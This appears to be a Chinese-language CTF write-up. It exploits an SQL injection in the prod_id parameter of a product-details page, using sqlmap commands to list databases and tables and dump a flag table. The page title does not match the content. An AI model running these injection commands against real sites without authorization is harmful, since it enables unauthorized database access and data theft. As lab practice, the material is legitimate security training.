0
点赞
收藏
分享

微信扫一扫

Filter& Listener & Interceptor

慕犹清 04-05 14:02 阅读 1

0x01:漏洞点

老样子先,看看标题介绍奥

ok了解到了 我们现在要知道参数是prod_id,路径为/pages/product_details.php

0x02:操作

直接打开SQLmap一把梭

sqlmap -u {URL}/pages/product_details.php?prod_id=1 --current-db

这里的是查看数据库,奥

这里的话当前库是MySQL,后面实际测的时候那个库在electricks里面

sqlmap -u {URL}/pages/product_details.php?prod_id=1 --dbs

这串就是查询库名

然后直接查询表

sqlmap -u {URL}/pages/product_details.php?prod_id=1 -D electricks --tables

直接爆出来吧我的Flag!!!!!

sqlmap -u {URL}/pages/product_details.php?prod_id=1 -D electricks -T flllaaaag --dump

举报

相关推荐

0 条评论